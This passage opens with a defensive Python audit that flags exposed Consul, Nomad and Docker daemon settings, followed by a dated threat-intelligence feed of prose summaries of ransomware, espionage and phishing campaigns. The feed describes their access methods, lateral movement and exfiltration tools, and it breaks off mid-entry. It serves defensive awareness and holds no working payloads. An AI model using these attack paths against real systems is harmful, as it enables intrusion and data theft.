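The settings the entry names are ordinary configuration: Consul's enable_script_checks lets a service registered through the agent HTTP API carry a script health check, so an unauthenticated caller runs commands; a Nomad API with ACLs disabled accepts jobs from anyone, and a job is code execution on the clients; a Docker daemon listening on tcp:// without tlsverify hands out root via a privileged container. The following is an added example, not Wiz's tooling: an audit of those documented settings over the configuration files themselves. Consul and Nomad accept JSON configuration and daemon.json is JSON, so the same functions can be pointed at real files with json.load; the sample configurations are constructed, with an exposed and a hardened variant for each service.

```python
"""Configuration audit for Consul, Nomad and the Docker daemon.

Added example, not Wiz's code. The checks encode documented settings
(Consul enable_script_checks / acl.enabled / client_addr, Nomad acl.enabled /
bind_addr / tls.http, Docker hosts / tlsverify). SAMPLE_CONFIGS are constructed.
"""
from __future__ import annotations

import json

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_consul(cfg: dict) -> list[tuple[str, str]]:
    f: list[tuple[str, str]] = []
    if cfg.get("enable_script_checks") is True:
        f.append(("critical", "enable_script_checks=true: a service registered through the agent "
                              "HTTP API may carry a script health check, so any caller can run "
                              "commands as the consul user; use enable_local_script_checks instead"))
    if not cfg.get("acl", {}).get("enabled", False):
        f.append(("high", "acl.enabled is false: agent, catalog and KV APIs accept unauthenticated requests"))
    addr = cfg.get("client_addr", "127.0.0.1")
    if addr not in LOOPBACK:
        f.append(("medium", f"client_addr={addr}: the HTTP API is bound beyond loopback"))
    return f


def audit_nomad(cfg: dict) -> list[tuple[str, str]]:
    f: list[tuple[str, str]] = []
    if not cfg.get("acl", {}).get("enabled", False):
        f.append(("critical", "acl.enabled is false: anyone reaching the API port can submit a job, "
                              "and a job is code execution on the client nodes"))
    addr = cfg.get("bind_addr", "127.0.0.1")
    if addr not in LOOPBACK and not cfg.get("tls", {}).get("http", False):
        f.append(("medium", f"bind_addr={addr} without tls.http: API reachable in clear text off-host"))
    return f


def audit_docker(cfg: dict) -> list[tuple[str, str]]:
    f: list[tuple[str, str]] = []
    tls_auth = bool(cfg.get("tlsverify"))
    for host in cfg.get("hosts", []):
        if host.startswith("tcp://") and not tls_auth:
            f.append(("critical", f"daemon API on {host} without tlsverify: any remote caller can "
                                  "start a privileged container and take over the host"))
    return f


AUDITS = {"consul": audit_consul, "nomad": audit_nomad, "docker": audit_docker}


def audit(kind: str, cfg: dict) -> list[tuple[str, str]]:
    """Run the audit for one service; kind is 'consul', 'nomad' or 'docker'."""
    return AUDITS[kind](cfg)


def worst_severity(findings: list[tuple[str, str]]) -> str:
    order = ["none", "medium", "high", "critical"]
    return max((sev for sev, _ in findings), key=order.index, default="none")


SAMPLE_CONFIGS = {  # constructed; each JSON string is in the service's own config format
    "consul_exposed": json.loads(
        '{"client_addr": "0.0.0.0", "enable_script_checks": true, "acl": {"enabled": false}}'),
    "consul_hardened": json.loads(
        '{"client_addr": "127.0.0.1", "enable_local_script_checks": true, '
        '"acl": {"enabled": true, "default_policy": "deny"}}'),
    "nomad_exposed": json.loads('{"bind_addr": "0.0.0.0", "acl": {"enabled": false}}'),
    "nomad_hardened": json.loads(
        '{"bind_addr": "0.0.0.0", "acl": {"enabled": true}, "tls": {"http": true}}'),
    "docker_exposed": json.loads(
        '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'),
    "docker_hardened": json.loads(
        '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"], "tlsverify": true, '
        '"tlscacert": "/etc/docker/ca.pem", "tlscert": "/etc/docker/server-cert.pem", '
        '"tlskey": "/etc/docker/server-key.pem"}'),
}

if __name__ == "__main__":
    for name, cfg in SAMPLE_CONFIGS.items():
        findings = audit(name.split("_")[0], cfg)
        print(f"{name}: {worst_severity(findings)}")
        for sev, msg in findings:
            print(f"  [{sev}] {msg}")
```

Note what the hardened variants keep: Nomad still binds 0.0.0.0 and Docker still listens on TCP, because clustering needs that; the exposure the campaign abuses comes from the missing authentication, not from the listener alone, so the audit flags the combination rather than the bind address by itself.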
2025-06-03
NightSpire_Ransomware
MEDIUM
+
Intel Source:
SOC Radar
Intel Name:
NightSpire_Ransomware
Date of Scan:
2025-06-03
Impact:
MEDIUM
Summary:
Researchers from SOCRadar have profiled a new financially motivated ransomware group called NightSpire that emerged in early 2025. The group employs double extortion: it steals sensitive data from victims and threatens to publish it on its data leak site if the ransom is not paid. NightSpire primarily targets small and medium-sized organisations in the technology, IT services, financial services, manufacturing, construction, education and healthcare sectors across the U.S., Taiwan, Hong Kong, Egypt and several European nations. The group gains initial access by exploiting known vulnerabilities in VPNs, firewalls or outdated web servers. Once inside, it uses legitimate system tools such as PowerShell or PsExec to move laterally, steal credentials and escalate privileges. Before deploying ransomware, it exfiltrates data to attacker-controlled servers using tools such as Rclone or MEGA. NightSpire communicates with victims over ProtonMail or Telegram.
Source: https://socradar.io/dark-web-profile-nightspire-ransomware/
2025-06-03
APT_28_Targeting_Western_Logistics_and_Technology_Entities
MEDIUM
+
Intel Source:
CISA
Intel Name:
APT_28_Targeting_Western_Logistics_and_Technology_Entities
Date of Scan:
2025-06-03
Impact:
MEDIUM
Summary:
A joint advisory issued by CISA, NSA, FBI and international partners warns that the GRU's Unit 26165, also known as APT28 or Fancy Bear, has been conducting a long-running cyber-espionage campaign against Western logistics and technology companies involved in the coordination, transport and delivery of foreign assistance to Ukraine. The threat actor employs multiple techniques to gain initial access, including password spraying, spearphishing, exploitation of vulnerabilities (in Outlook, Roundcube and WinRAR, among others) and abuse of SOHO devices and VPNs. More recently, the group has expanded its activity to target internet-connected cameras in Ukraine and bordering NATO countries to monitor aid shipments. Once inside a network, the threat actor conducts reconnaissance and often uses tools such as Impacket, PsExec, Certipy and ADExplorer for lateral movement and data exfiltration, focusing on sensitive information related to aid shipments.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a
2025-06-02
Lyrix_Ransomware_Targeting_Windows
MEDIUM
Intel Source:
CYFIRMA
Intel Name:
Lyrix_Ransomware_Targeting_Windows
Date of Scan:
2025-06-02
Impact:
MEDIUM
Summary:
CYFIRMA researchers have identified Lyrix Ransomware, a Python-based malware compiled with PyInstaller, targeting Windows operating systems. First observed on April 20, 2025, Lyrix employs strong AES encryption, appends a '.02dq34jROu' extension to encrypted files, and utilizes advanced evasion techniques such as anti-VM checks (via VirtualProtect) and process manipulation (GetCurrentProcess, TerminateProcess). The financially motivated attackers issue ransom demands, threaten to leak stolen data from user directories like Downloads and Documents, and attempt to cripple system recovery by deleting Volume Shadow Copies and disabling WinRE. The malware's discovery on underground forums and the ProtonMail contact address creation in April 2025 indicate recent actor activity.
Source: https://www.cyfirma.com/research/lyrix-ransomware/
2025-06-02
Lazarus_Targeting_Crypto_via_Phishing
MEDIUM
Intel Source:
BitMEX
Intel Name:
Lazarus_Targeting_Crypto_via_Phishing
Date of Scan:
2025-06-02
Impact:
MEDIUM
Summary:
BitMEX researchers have analyzed how the Lazarus Group, linked to the North Korean government, continues its financially motivated campaigns against the cryptocurrency sector. The threat actors rely on initial phishing and social engineering, such as recent LinkedIn pretexts for fake web3 project collaborations, to trick victims into executing malicious code often hosted in private GitHub repositories. This initial payload, as detailed by BitMEX, exfiltrates victim metadata to a misconfigured Supabase instance and deploys a second-stage JavaScript credential stealer, resembling "BeaverTail", aimed at pilfering browser data and cryptocurrency wallet access.
Source: https://blog.bitmex.com/bitmex-busts-lazarus-group/
2025-06-02
APT_C_53_Military_Themed_LNK_Attacks
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
APT_C_53_Military_Themed_LNK_Attacks
Date of Scan:
2025-06-02
Impact:
MEDIUM
Summary:
The 360 Advanced Threat Research Institute has recently captured VBScript samples attributed to APT-C-53 (Gamaredon), an advanced persistent threat group active since 2013 and known for targeting government and military entities for intelligence theft. This campaign employs highly obfuscated VBS scripts and malicious LNK shortcut files, using military intelligence themes as bait to entice users into executing payloads via social engineering. The attackers utilize a phased deployment mechanism, achieving persistence through infected user files, registry modifications, and scheduled tasks, ultimately aiming to exfiltrate sensitive information. Forged HTTP request headers, including User-Agent and Referer fields referencing Ukrainian government domains, are used for command-and-control communication, which carries Base64-encoded data.
Source: https://mp.weixin.qq.com/s/sVc2dLNJwbpgEzBXkFyBRw
2025-06-01
New_AsyncRAT_Campaign_Targets_Italian_Users
LOW
Intel Source:
CERT-AGID
Intel Name:
New_AsyncRAT_Campaign_Targets_Italian_Users
Date of Scan:
2025-06-01
Impact:
LOW
Summary:
CERT-AGID researchers have uncovered a phishing campaign targeting users in Italy with AsyncRAT malware. The attack starts with an English-language email impersonating the legitimate company Arabian Construction Co, claiming the recipient is being considered as a potential supplier and inviting them to view a file. Instead of an attachment, the email includes a Box.com link to download a TAR file containing a hidden JavaScript file. When executed, the script runs PowerShell to download a DLL from Aruba Drive. The DLL checks whether it is running in a virtual machine, then downloads and executes AsyncRAT. This malware allows attackers to take control of infected machines, steal data and run commands remotely.
Source: https://cert-agid.gov.it/news/asyncrat-distribuito-in-italia-tramite-componenti-steganografici/
2025-06-01
DragonForce_Exploits_SimpleHelp_for_MSP_Attacks
MEDIUM
Intel Source:
Sophos
Intel Name:
DragonForce_Exploits_SimpleHelp_for_MSP_Attacks
Date of Scan:
2025-06-01
Impact:
MEDIUM
Summary:
Sophos researchers have uncovered that DragonForce ransomware operators are exploiting a chain of vulnerabilities (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) in SimpleHelp remote monitoring and management (RMM) software, released in January 2025. The attackers target Managed Service Providers (MSPs) to gain access to their environments and those of their clients. In one investigated case, the threat actors compromised an MSP’s SimpleHelp instance, mapped connected customer environments, and deployed DragonForce ransomware across multiple systems. They also exfiltrated sensitive data to enable double extortion tactics. Active since mid-2023, DragonForce operates as a Ransomware-as-a-Service (RaaS) platform with a growing affiliate base, including members linked to groups like Scattered Spider, presenting a serious supply chain threat to organizations reliant on MSPs.
Source: https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/
2025-06-01
Void_Blizzard_Espionage_Targets_Critical_Sectors
HIGH
Intel Source:
Microsoft
Intel Name:
Void_Blizzard_Espionage_Targets_Critical_Sectors
Date of Scan:
2025-06-01
Impact:
HIGH
Summary:
Microsoft researchers have disclosed details of Void Blizzard (also tracked as LAUNDRY BEAR), a Russia-affiliated actor active since at least April 2024 that conducts cyberespionage operations against organizations crucial to Russian government objectives, primarily in Europe and North America. Targets include the government, defense, transportation, media, NGO, and healthcare sectors, with a disproportionate focus on NATO member states and Ukraine. Void Blizzard initially gained access by using stolen credentials, likely procured from infostealer ecosystems, to access Exchange and SharePoint Online for large-scale email and file exfiltration. As of April 2025, the actor evolved its tactics to include adversary-in-the-middle (AitM) spear phishing, using typosquatted domains and the Evilginx framework to spoof Microsoft Entra authentication and steal credentials and session cookies.
Source: https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/
2025-05-31
Stealthy_WooCommerce_Formjacking_Malware
LOW
Intel Source:
Wordfence
Intel Name:
Stealthy_WooCommerce_Formjacking_Malware
Date of Scan:
2025-05-31
Impact:
LOW
Summary:
The Wordfence researchers have identified a sophisticated formjacking malware targeting e-commerce sites using WooCommerce. Active since at least April 2025, this malware injects a convincing, fake payment form into the checkout process to steal sensitive customer data, including full card details and personal information. Attackers achieve initial access likely through compromised WordPress administrator accounts, then inject the malicious JavaScript via custom code plugins. The malware stealthily captures data by continuously monitoring billing fields and storing it in the browser's localStorage for persistence across sessions and resilience against network interruptions. Upon the customer clicking "Place Order," the script exfiltrates the collected data to a remote command-and-control server using the navigator.sendBeacon() method, which avoids user awareness and common detection triggers.
Source: https://www.wordfence.com/blog/2025/05/sophisticated-stealthy-formjacking-malware-targets-e-commerce-checkout-pages/
2025-05-31
Fake_Agenzia_Entrate_Refund_Scam
LOW
Intel Source:
CERT-AGID
Intel Name:
Fake_Agenzia_Entrate_Refund_Scam
Date of Scan:
2025-05-31
Impact:
LOW
Summary:
CERT-AGID researchers have uncovered a phishing campaign impersonating Italy’s Revenue Agency (Agenzia delle Entrate), in which threat actors distribute fake refund emails to trick recipients into entering personal and credit card information on a fraudulent website. The Ministry of Economy and Finance (MEF) has been notified, and efforts are underway to take down the malicious domain.
Source: https://cert-agid.gov.it/wp-content/uploads/2025/05/phishing_AdE_2.json
2025-05-31
MSHTA_LOLBin_Delivers_Obfuscated_Infostealer
MEDIUM
Intel Source:
LevelBlue
Intel Name:
MSHTA_LOLBin_Delivers_Obfuscated_Infostealer
Date of Scan:
2025-05-31
Impact:
MEDIUM
Summary:
LevelBlue's analysis, published May 27, 2025, details an emerging threat involving multi-stage malware delivery initiated by mshta.exe, a native Windows LOLBin. Attackers leverage MSHTA to fetch an initially disguised .tmp file, hosted on cloud infrastructure like Alibaba Cloud Object Storage, which contains heavily obfuscated VBScript. This script employs techniques like XOR and Base64 encoding to deobfuscate and execute subsequent PowerShell payloads via WMI, ultimately leading to the deployment of a sophisticated infostealer.
Source: https://levelblue.com/blogs/security-essentials/hunting-malware-with-mshta-and-cyberchef
2025-05-30
Fancy_Bear_SpyPress_XSS_Campaign
MEDIUM
Intel Source:
PolySwarm
Intel Name:
Fancy_Bear_SpyPress_XSS_Campaign
Date of Scan:
2025-05-30
Impact:
MEDIUM
Summary:
PolySwarm researchers have uncovered Operation RoundPress, an ongoing cyberespionage campaign attributed to the Russia-aligned threat group Fancy Bear, active since 2023 and expanding through 2024. The operation leverages SpyPress, a malicious JavaScript payload delivered through spearphishing emails that exploit cross-site scripting (XSS) vulnerabilities in webmail platforms such as Roundcube, Horde, Zimbra and MDaemon, including zero-days like CVE-2024-11182 in MDaemon. The campaign primarily targets Ukrainian government agencies, Eastern European defense contractors, and government organizations across Africa, the EU, and South America.
Source: https://blog.polyswarm.io/fancy-bears-spypress-malware
2025-05-30
Leverage_Maha_Grass_Tools_via_Brain_Worm_Infra
MEDIUM
Intel Source:
Qianxin Threat Intelligence Center
Intel Name:
Leverage_Maha_Grass_Tools_via_Brain_Worm_Infra
Date of Scan:
2025-05-30
Impact:
MEDIUM
Summary:
Researchers at Qianxin have uncovered substantial overlaps in infrastructure and tooling between two advanced persistent threat (APT) groups: Maha Grass (APT-Q-36) and Brain Worm (APT-Q-38). Both groups are active in cyber espionage operations targeting organizations across South Asia and the broader Asian region. Since late February 2025, Brain Worm has been observed using a malware-hosting domain that was also recently associated with a Spyder downloader variant deployed by Maha Grass. A notable connection between the two groups is the use of the same digital signature "Ebo Sky Tech Inc" on malware samples, but applied on different dates: January 28 for Brain Worm and February 16 for Maha Grass. Both groups rely on spear-phishing attacks using malicious PowerPoint files embedded with VBA macros. These macros deliver an initial payload that subsequently downloads additional components, including DLL files and the Spyder downloader. The Spyder variant employed by both APTs features XOR-encrypted configurations, establishes persistence via scheduled tasks, remaps system DLLs, and exfiltrates data using Base64-encoded JSON payloads embedded in custom HTTP headers. To evade detection, the malware disguises its command-and-control (C2) traffic as legitimate network communication, spoofing well-known services such as GitHub.
Source: https://mp.weixin.qq.com/s/pJTPeK1Cam5n4RUElWzb2Q
2025-05-30
ALCATRAZ_Obfuscated_DOUBLELOADER_Backdoor
MEDIUM
Intel Source:
Elastic Security Labs
Intel Name:
ALCATRAZ_Obfuscated_DOUBLELOADER_Backdoor
Date of Scan:
2025-05-30
Impact:
MEDIUM
Summary:
Researchers from Elastic Security Labs have discovered DOUBLELOADER, a newly identified backdoor malware often found in conjunction with the RHADAMANTHYS infostealer. This malware duo is notably protected by the ALCATRAZ open-source obfuscator, which has been in use since January 2023 by both cybercriminal groups and APT actors. DOUBLELOADER has been active since at least December 2024 and leverages ALCATRAZ to complicate binary analysis and extend its operational lifespan. DOUBLELOADER performs direct system calls for tasks such as injecting code into the explorer.exe process, gathering host system information, and communicating with a hardcoded command-and-control server for updates. The ALCATRAZ obfuscator enhances evasion by applying multiple layers of protection, including control flow flattening, instruction mutation, constant unfolding, LEA constant hiding, anti-disassembly techniques, and entrypoint obfuscation. These obfuscation methods are frequently embedded within a custom PE section named .0Dev.
Source: https://www.elastic.co/security-labs/deobfuscating-alcatraz
2025-05-30
Mimo_Exploits_Craft_CMS_for_Cryptomining
LOW
Intel Source:
Sekoia
Intel Name:
Mimo_Exploits_Craft_CMS_for_Cryptomining
Date of Scan:
2025-05-30
Impact:
LOW
Summary:
Researchers at Sekoia have identified a group called Mimo, active since at least March 2022, exploiting a newly disclosed vulnerability (CVE-2025-32432) in the Craft content management system to break into servers. After gaining access, the attackers, believed to be based in Turkey, install a backdoor that allows remote access to the compromised server and run a script named 4l4md4r.sh to download a program written in Go. This program installs both a cryptominer called XMRig and a tool called IPRoyal, used to exploit the victim's internet bandwidth. They also use techniques like LD_PRELOAD hijacking, which helps hide their malicious activity on the system.
Source: https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/
2025-05-29
Chihuahua_Infostealer
LOW
Intel Source:
Picussecurity
Intel Name:
Chihuahua_Infostealer
Date of Scan:
2025-05-29
Impact:
LOW
Summary:
Researchers at Picus Security have uncovered a .NET-based malware called Chihuahua Infostealer, which emerged in April 2025 and targets browser credentials and cryptocurrency wallet data. The malware, likely created by Russian-speaking developers, begins with social engineering that tricks victims into executing a malicious PowerShell script, often delivered through trusted platforms like Google Drive. This script starts a multi-stage infection chain involving a Base64-encoded payload, followed by a second-stage script that sets up a scheduled task for persistence and further payload execution. The final .NET payload is downloaded from OneDrive and runs directly in memory to evade detection. The infection chain steals data from various browsers and cryptocurrency wallets. The stolen data is encrypted and exfiltrated over HTTPS, while local evidence of the attack is erased.
Source: https://www.picussecurity.com/resource/blog/chihuahua-stealer-malware-targets-browser-and-wallet-data
2025-05-29
Danabot_MaaS_Disruption_and_Analysis
MEDIUM
Intel Source:
ESET Research
Intel Name:
Danabot_MaaS_Disruption_and_Analysis
Date of Scan:
2025-05-29
Impact:
MEDIUM
Summary:
According to ESET Research, the Danabot Malware-as-a-Service (MaaS) operation, an infostealer and banking trojan active since 2018, was recently disrupted by a multinational law enforcement effort, Operation Endgame, in May 2025. The Danabot group, including individuals identified as JimmBee and Onix, provided affiliates with tools to steal financial data, deploy secondary malware like ransomware, and conduct DDoS attacks against global victims, with early campaigns targeting Australia and Poland. Attackers distributed Danabot via spam, malicious Google Ads, and deceptive websites that tricked users into executing the malware on Windows systems.
Source: https://www.welivesecurity.com/en/eset-research/danabot-analyzing-fallen-empire/
2025-05-29
Operation_Endgame_2_0
MEDIUM
Intel Source:
Zscaler
Intel Name:
Operation_Endgame_2_0
Date of Scan:
2025-05-29
Impact:
MEDIUM
Summary:
Zscaler researchers have observed that law enforcement agencies have released information about an ongoing coordinated effort under "Operation Endgame", a joint campaign aimed at seizing and taking down DanaBot infrastructure, primarily within the United States. This operation has already disrupted several malware families like SmokeLoader, IcedID, Pikabot, and Bumblebee, and now includes actions against DanaBot. DanaBot is sold on underground forums as Malware-as-a-Service (MaaS). Its primary functions include stealing sensitive data, injecting malicious content into web browsers and deploying additional malware such as ransomware and remote access trojans. Notably, DanaBot can capture keystrokes, take screenshots, record the screen, and even access the victim's system remotely. DanaBot's communications with C2 servers use strong encryption and utilize Tor to anonymize and secure these connections.
Source: https://www.zscaler.com/blogs/security-research/operation-endgame-2-0-danabusted
2025-05-28
Operation_Sindoor
LOW
Intel Source:
Seqrite
Intel Name:
Operation_Sindoor
Date of Scan:
2025-05-28
Impact:
LOW
Summary:
Researchers from Seqrite Labs have uncovered multiple cyber attacks linked to Operation Sindoor, involving both state-sponsored and hacktivist groups. The campaign is associated with the Pakistan-aligned threat groups APT36 and SideCopy and targeted critical Indian sectors such as defense, government IT systems, healthcare, telecom, and education. It involved spear phishing with malicious documents (macros, shortcuts, scripts) that deployed the Ares malware for espionage, while hacktivist groups launched DDoS attacks, defaced websites, and leaked stolen data. The operation also leveraged spoofed domains mimicking military and government entities to spread false information and cause disruption.
Source: https://www.seqrite.com/blog/operation-sindoor-anatomy-of-a-digital-siege/
2025-05-28
TAG_110_Targets_Tajikistan_Entities
MEDIUM
Intel Source:
Recorded Future
Intel Name:
TAG_110_Targets_Tajikistan_Entities
Date of Scan:
2025-05-28
Impact:
MEDIUM
Summary:
Researchers at Insikt Group have uncovered a phishing campaign conducted by the Russian threat actor TAG-110, targeting government, educational, and research institutions in Tajikistan. In this campaign, the threat actor has changed tactics by leveraging macro-enabled Word template files (.dotm) to gain initial access and persistence instead of deploying the HTA-based payload HATVIBE. These VBA-enabled templates are embedded within government-themed documents. When the recipient opens the document, the malware copies itself to the Word STARTUP folder, allowing it to run automatically every time Word is opened. It collects system information and sends it to a C2 server. This campaign focused on intelligence gathering related to government operations, military affairs, and political events such as elections, to support Russian strategic interests in Central Asia.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2025-0522.pdf
2025-05-28
Chinese_Threat_Actor_Exploiting_Ivanti_EMM_Vulnerability
MEDIUM
Intel Source:
EclecticIQ
Intel Name:
Chinese_Threat_Actor_Exploiting_Ivanti_EMM_Vulnerability
Date of Scan:
2025-05-28
Impact:
MEDIUM
Summary:
EclecticIQ researchers have identified that the China-nexus threat actor UNC5221 is actively exploiting two critical Ivanti Endpoint Manager Mobile (EPMM) vulnerabilities (CVE-2025-4427 and CVE-2025-4428). The attackers are targeting internet-facing EPMM systems across critical sectors in Europe, North America, and the Asia-Pacific. They gain initial access through unauthenticated remote code execution, using Java Reflection to execute commands. Post-exploitation, they deploy the KrustyLoader malware, which downloads a hidden second-stage payload from AWS storage. This malware decrypts and injects itself directly into system memory to maintain long-term access. The threat actors then leverage MySQL credentials to access the EPMM database and exfiltrate sensitive data, including authentication credentials, device details and Office 365 tokens. They also use a tool called FRP (Fast Reverse Proxy) for network reconnaissance and lateral movement.
Source: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability
2025-05-27
Amos_Stealer_Targeting_macOS_Users
LOW
Intel Source:
motuariki (X)
Intel Name:
Amos_Stealer_Targeting_macOS_Users
Date of Scan:
2025-05-27
Impact:
LOW
Summary:
Security researcher motuariki has disclosed additional Command and Control (C2) infrastructure and sample hashes associated with Amos Stealer, a known macOS malware. The shared C2 endpoint was listed alongside other similar IP-based C2s. This ongoing activity signifies a persistent threat from Amos Stealer targeting macOS users for credential and data theft.
Source: https://x.com/motuariki_/status/1924330564880159165
2025-05-27
APT_Spear_Phishing_Surge_in_Korea
LOW
Intel Source:
ASEC
Intel Name:
APT_Spear_Phishing_Surge_in_Korea
Date of Scan:
2025-05-27
Impact:
LOW
Summary:
ASEC researchers have observed an increase in Advanced Persistent Threat (APT) attacks in South Korea during April 2025, with spear phishing identified as the most common infiltration method. Targeted phishing attacks use thorough reconnaissance, spoofed sender addresses, and malware attachments or links to trick recipients. AhnLab identified a particular variation involving LNK files, in which attackers distributed CAB-compressed malicious scripts encoded in LNK files carrying PowerShell commands. When launched, these scripts can extract decoy documents, leak system information, and install other malware on the victim's computer.
Source: https://asec.ahnlab.com/en/87945/
2025-05-26
Phishing_Campaign_Abuses_jsDelivr
LOW
Intel Source:
Fortra
Intel Name:
Phishing_Campaign_Abuses_jsDelivr
Date of Scan:
2025-05-26
Impact:
LOW
Summary:
Researchers at Fortra have identified a phishing campaign targeting Microsoft O365 users. The attack begins with a phishing email containing an .htm file that hides AES-encrypted JavaScript code. Once decrypted, the script connects to a fake open-source package on npm, served through a CDN like jsDelivr. This package then generates customized phishing links that include the victim's email address. These links redirect the victim through multiple websites before landing on a fake Office 365 login page to steal their credentials.
Source: https://www.fortra.com/blog/threat-analysis-malicious-npm-package-leveraged-o365-phishing-attack
2025-05-26
Bumblebee_Spread_via_Bing_SEO_Poisoning
MEDIUM
Intel Source:
CYJAX
Intel Name:
Bumblebee_Spread_via_Bing_SEO_Poisoning
Date of Scan:
2025-05-26
Impact:
MEDIUM
Summary:
Cyjax researchers have identified a new Bumblebee malware distribution campaign that exploits Bing SEO poisoning. The attackers target users searching for software like WinMTR and Milestone XProtect by creating fake download sites. These sites, hosted on a Truehost Cloud server in Nairobi, rank highly in Bing search results and deliver trojanized MSI installers from an external domain. When executed via msiexec.exe, the installer drops both legitimate software components and malicious files, including a tampered version.dll and icardagt.exe. The executable loads the malicious DLL, leading to the deployment of the Bumblebee malware. Once active, Bumblebee connects to command-and-control (C2) domains using unique 13-character strings followed by a .life TLD. The campaign appears to be an evolution of a similar 2023 SEO poisoning strategy and is now focused on targeting less mainstream software tools often used in technical development environments.
Source: https://www.cyjax.com/resources/blog/a-sting-on-bing-bumblebee-delivered-through-bing-seo-poisoning-campaign/
2025-05-26
ViciousTrap_Edge_Device_Honeypot_Network
LOW
Intel Source:
Sekoia
Intel Name:
ViciousTrap_Edge_Device_Honeypot_Network
Date of Scan:
2025-05-26
Impact:
LOW
Summary:
Researchers from Sekoia have identified ViciousTrap, an actor compromising over 5,500 edge devices globally since March 2025, primarily in Asia, to create a distributed honeypot network. Likely Chinese-speaking, ViciousTrap exploits vulnerabilities like CVE-2023-20118 in devices from over 50 brands, using a script (NetGhost) to redirect traffic from compromised systems to its Malaysian-based interception servers, enabling Man-in-the-Middle data collection on various monitored assets, including some in Taiwan and the US.
Source: https://blog.sekoia.io/vicioustrap-infiltrate-control-lure-turning-edge-devices-into-honeypots-en-masse/
2025-05-25
MUT_9332_Targets_Solidity_Developers
MEDIUM
Intel Source:
Datadog
Intel Name:
MUT_9332_Targets_Solidity_Developers
Date of Scan:
2025-05-25
Impact:
MEDIUM
Summary:
Datadog researchers have uncovered a campaign by the threat actor MUT-9332 targeting Solidity developers on Windows systems. The attackers leveraged deceptive VS Code extensions that appeared legitimate but secretly ran malicious code in the background. These malicious extensions, discovered between April and May 2025 before being removed from the Marketplace, initiated multi-stage infection chains involving obfuscated JavaScript, PowerShell scripts and steganography to hide payloads within image files. Their primary goal was to steal sensitive information such as cryptocurrency wallet credentials and system information, and to deploy a remote access tool called Quasar RAT to give the attackers control over the victim's system.
Source: https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/
2025-05-25
PureRAT_Spam_Attacks_in_Russia
LOW
Intel Source:
Securelist
Intel Name:
PureRAT_Spam_Attacks_in_Russia
Date of Scan:
2025-05-25
Impact:
LOW
Summary:
Securelist researchers discovered an increase in attacks against Russian enterprises utilizing the Pure malware family, specifically PureRAT and PureLogs. This campaign has been active since March 2023, and it experienced a fourfold growth in early 2025 compared to the same period in 2024. The campaign, which is distributed via spam emails containing malicious RAR files or links, deceives users by using accounting-related file names and double extensions such as .pdf.rar.
Source: https://securelist.ru/purerat-attacks-russian-organizations/112619/
2025-05-24
Fake_Zoom_Invites_Steal_Credentials
LOW
Intel Source:
Spider Labs
Intel Name:
Fake_Zoom_Invites_Steal_Credentials
Date of Scan:
2025-05-24
Impact:
LOW
Summary:
SpiderLabs researchers have identified a phishing campaign targeting corporate users with fake Zoom meeting invitations designed to steal login credentials. The attackers use urgent, legitimate-looking emails to lure recipients into clicking malicious links. These links lead to deceptive Zoom pages that play pre-recorded videos to make it appear that a live meeting is in progress; after a fake disconnection message, the page asks users to enter their credentials on a fake login screen. Once entered, the stolen information is immediately sent to the attackers through Telegram. The primary objective of this campaign is to steal login credentials, which could lead to account takeovers.
Source: https://x.com/SpiderLabs/status/1924424257083179462
2025-05-23
W3LL_Phishing_Kit_Hits_Outlook_Users
MEDIUM
Intel Source:
Hunt.IO
Intel Name:
W3LL_Phishing_Kit_Hits_Outlook_Users
Date of Scan:
2025-05-23
Impact:
MEDIUM
Summary:
Researchers from Hunt.IO have discovered a phishing campaign leveraging the W3LL Phishing Kit to target Microsoft Outlook credentials. This Phishing-as-a-Service (PaaS) tool, initially identified by Group-IB in 2022 and available through the W3LL Store marketplace, enables attackers to conduct adversary-in-the-middle (AiTM) attacks to hijack session cookies and bypass multi-factor authentication. The observed campaign utilized an open directory on an IP address to host W3LL phishing kit components, including IonCube-obfuscated PHP files in folders named "OV6". The phishing lure involved a fake Adobe Shared File service webpage that, upon attempted login, sent credentials via a POST request, specifically to a /wazzy.php endpoint.
Source: https://hunt.io/blog/phishing-kit-targets-outlook-credentials
2025-05-23
TA406_Targeting_Government_Entities_in_Ukraine
MEDIUM
Intel Source:
Proofpoint
Intel Name:
TA406_Targeting_Government_Entities_in_Ukraine
Date of Scan:
2025-05-23
Impact:
MEDIUM
Summary:
Researchers from Proofpoint have uncovered phishing campaigns run by the DPRK state-sponsored actor TA406, also known as Opal Sleet and Konni, targeting government entities in Ukraine. The campaigns focus on credential harvesting and malware deployment to collect intelligence related to the ongoing Russian invasion. The attackers impersonate think tank members and send fake Microsoft security alerts to trick people into opening malicious files in HTML, CHM, ZIP or LNK formats. These files execute a hidden PowerShell script that gathers host data, establishes persistence via autorun batch files and sends the data to servers controlled by the attackers.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front
2025-05-23
PyBitmessage_Backdoor_Malware
LOW
Intel Source:
ASEC
Intel Name:
PyBitmessage_Backdoor_Malware
Date of Scan:
2025-05-23
Impact:
LOW
Summary:
ASEC researchers have identified a hidden backdoor that installs alongside a Monero cryptocurrency miner and leverages the PyBitmessage library for C2 communications. The initial malware decrypts and deploys both the coinminer and a fileless PowerShell-based backdoor that executes directly in memory and downloads additional malicious tools from GitHub or Russian file hosting services. The attacker's primary motive is to exploit compromised systems for cryptocurrency mining while establishing persistent access through the backdoor for potential further attacks.
Source: https://asec.ahnlab.com/ko/88104/
2025-05-22
Tycoon2FA_Phishing_Using_Malformed_URLs
MEDIUM
Intel Source:
SpiderLabs
Intel Name:
Tycoon2FA_Phishing_Using_Malformed_URLs
Date of Scan:
2025-05-22
Impact:
MEDIUM
Summary:
